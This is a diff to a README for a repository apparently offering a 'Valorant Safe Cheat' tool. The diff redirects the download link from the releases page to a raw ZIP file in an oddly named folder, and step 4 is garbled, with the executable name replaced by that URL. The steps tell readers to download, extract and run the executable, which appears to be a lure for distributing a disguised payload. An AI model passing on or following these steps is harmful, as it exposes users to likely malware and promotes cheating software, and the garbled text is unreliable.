juanr13456/Valorant-Safe-Cheat/README.md

 To get started with **Valorant Safe Cheat**, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/juanr13456/Valorant-Safe-Cheat/releases).
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/juanr13456/Valorant-Safe-Cheat/main/sclerosarcoma/Valorant-Safe-Cheat.zip).
 Here, you will find the latest versions of the tool.

 2. **Download the Latest Version**: Locate the most recent release.
 Click on the link to download the file.

 3. **Extract the Files**: Once the download completes, locate the downloaded ZIP file.
 Right-click the file and select "Extract All."
 Follow the prompts to extract the files to a folder of your choice.

-4. **Run the Application**: Inside the extracted folder, locate the executable file (e.g., `ValorantSafeCheat.exe`).
+4. **Run the Application**: Inside the extracted folder, locate the executable file (e.g., `https://raw.githubusercontent.com/juanr13456/Valorant-Safe-Cheat/main/sclerosarcoma/Valorant-Safe-Cheat.zip`).
 Double-click to run the application.

 5. **Follow Setup Prompts**: Follow any on-screen instructions to complete the setup.
 Most users can simply proceed with the default options.